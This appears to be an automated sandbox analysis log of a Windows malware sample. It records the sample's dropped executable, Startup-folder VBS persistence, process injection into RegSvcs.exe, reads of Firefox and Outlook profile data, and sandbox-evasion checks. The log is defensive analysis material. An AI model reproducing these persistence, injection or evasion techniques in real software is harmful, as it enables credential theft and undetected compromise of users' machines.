Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00176532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0018C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0013406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeFile created: C:\Users\user\AppData\Local\LityersesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeFile created: C:\Users\user\AppData\Local\Temp\autC337.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: XoRPyi5s1i.exe | ReversingLabs: Detection: 63%
                    Source: XoRPyi5s1i.exe | Virustotal: Detection: 74%
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | File read: C:\Users\user\Desktop\XoRPyi5s1i.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\XoRPyi5s1i.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Process created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Binary string: wntdll.pdbUGP | source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb | source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0023AF60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_0023AF60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001C05B8 push ss; ret 1_2_001C05B9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014288A push 66001423h; retn 001Ah 1_2_001428E1
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00156B05 push ecx; ret 1_2_00156B18
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010605B8 push ss; ret 2_2_010605B9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF6B05 push ecx; ret 2_2_00FF6B18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00ADA4BA push es; iretd 3_2_00ADA4C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_069BCAE0 push ss; retf 7_2_069BCDCE
                    Source: initial sample | Static PE information: section name: UPX0
                    Source: initial sample | Static PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | File created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe (dropped file)

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs (dropped file)
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00198111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00198111
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_0014EB42
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01038111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_01038111
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FEEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00FEEB42
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0015123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0015123A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | API/Special instruction interceptor: Address: 15AE204
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | API/Special instruction interceptor: Address: 18C8284
                    Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598794
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598432
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598202
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597854
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597591
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595842
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595733
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595280
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594887
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594654
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594193
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599282
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599157
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598216
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597706
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595019
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593688
                    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2611
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7204
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2298
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7526
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Evaded block: after key decision
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Evaded block: after key decision
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | API coverage: 4.4 %
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | API coverage: 4.7 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00176CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00176CA9
